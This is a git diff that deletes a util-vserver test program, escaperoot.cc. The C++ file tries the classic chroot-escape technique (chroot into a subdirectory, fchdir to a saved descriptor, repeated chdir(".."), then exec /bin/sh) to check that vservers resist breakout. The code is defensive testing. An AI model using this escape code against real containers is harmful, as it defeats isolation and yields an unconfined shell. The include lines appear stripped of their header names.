X-Git-Url: http://git.onelab.eu/?a=blobdiff_plain;ds=sidebyside;f=tests%2Fescaperoot.cc;fp=tests%2Fescaperoot.cc;h=0000000000000000000000000000000000000000;hb=d8fc1f54604dba7f52d3d220363140ab42af19c4;hp=b10d58c7356541908159ee9a528898db8da120ac;hpb=30a26545c44a9b6643e01602535309cb53fbe435;p=util-vserver.git diff --git a/tests/escaperoot.cc b/tests/escaperoot.cc deleted file mode 100644 index b10d58c..0000000 --- a/tests/escaperoot.cc +++ /dev/null @@ -1,115 +0,0 @@ -// $Id: escaperoot.cc,v 1.1.4.1 2003/10/30 15:12:34 ensc Exp $ - -// Copyright (C) 2003 Enrico Scholz -// based on tests/escaperoot.cc by Jacques Gelinas -// -// This program is free software; you can redistribute it and/or modify -// it under the terms of the GNU General Public License as published by -// the Free Software Foundation; either version 2, or (at your option) -// any later version. -// -// This program is distributed in the hope that it will be useful, -// but WITHOUT ANY WARRANTY; without even the implied warranty of -// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -// GNU General Public License for more details. -// -// You should have received a copy of the GNU General Public License -// along with this program; if not, write to the Free Software -// Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. - -/* - This program tries to escape out of a vserver using chroot flaws. - Once escaped, it exec a shell. - - None of this works on 2.4.13. -*/ -#include -#include -#include -#include -#include -#include -#include -#include - -static void print_pwd() -{ - char path[PATH_MAX]; - if (getcwd(path,sizeof(path)-1)!=NULL){ - printf ("PWD: %s\n",path); - } -} -/* - Just set a chroot in a sub-directory and keep the - current directory behind -*/ -static void test1() -{ - printf ("test1\n"); - print_pwd(); - mkdir ("dummy_dir",0755); - if (chroot ("dummy_dir")==-1){ - fprintf (stderr,"Can't chroot into dummy_dir (%s)\n",strerror(errno)); - }else{ - // Try to chdir into the real root - for (int i=0; i<1000; i++) chdir(".."); - print_pwd(); - if (execl ("/bin/sh","/bin/sh",NULL)==-1){ - fprintf (stderr,"execl /bin/sh failed (%s)\n",strerror(errno)); - } - } -} - -/* - Same as test1, except we open the current directory and do - a fchdir() to it before trying to escape to the real root. -*/ -static void test2() -{ - printf ("test2\n"); - print_pwd(); - mkdir ("dummy_dir",0755); - int fd = open (".",O_RDONLY); - if (fd == -1){ - fprintf (stderr,"Can't open current directory (%s)\n",strerror(errno)); - }else if (chroot ("dummy_dir")==-1){ - fprintf (stderr,"Can't chroot into dummy_dir (%s)\n",strerror(errno)); - }else if (fchdir(fd)==-1){ - fprintf (stderr,"Can't fchdir to the current directory (%s)\n" - ,strerror(errno)); - }else{ - // Try to chdir into the real root - for (int i=0; i<1000; i++) chdir(".."); - print_pwd(); - if (execl ("/bin/sh","/bin/sh",NULL)==-1){ - fprintf (stderr,"execl /bin/sh failed (%s)\n",strerror(errno)); - } - } -} - -/* - Perform the test in a sub-process so it won't affect the current one -*/ -static void dotest (void (*f)()) -{ - pid_t pid = fork(); - if (pid == 0){ - f(); - _exit (0); - }else if (pid == -1){ - fprintf (stderr,"Can't fork (%s)\n",strerror(errno)); - }else{ - int status; - wait (&status); - } -} - -int main (int, char *[]) -{ - dotest (test1); - dotest (test2); - printf ("All attempts failed\n"); - return 0; -} - -